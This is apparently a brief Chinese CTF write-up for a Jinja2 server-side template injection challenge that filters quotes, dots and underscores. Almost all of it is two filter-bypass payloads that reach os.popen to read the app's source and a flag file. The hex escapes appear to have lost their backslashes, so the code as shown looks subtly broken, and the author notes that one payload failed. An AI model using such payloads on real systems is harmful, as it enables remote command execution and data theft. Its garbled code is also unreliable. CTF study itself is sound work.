明显的ssti
过滤单引号,点,下划线
直接丢exp了
读源码
{{()["x5fx5fclassx5fx5f"]["x5fx5fmrox5fx5f"][1]["x5fx5fsubclassesx5fx5f"]()[127]["x5fx5finitx5fx5f"]["x5fx5fglobalsx5fx5f"]["popen"]("cat%20appx2epy")["read"]()}}
读flag
{{()["x5fx5fclassx5fx5f"]["x5fx5fmrox5fx5f"][1]["x5fx5fsubclassesx5fx5f"]()[127]["x5fx5finitx5fx5f"]["x5fx5fglobalsx5fx5f"]["popen"]("cat%20/proc/self/fd/3")["read"]()}}
我感觉上面的应该就可以了,不过就是读不出来东西,可能有点细微的差别,用另外一个get_data就可以成功了。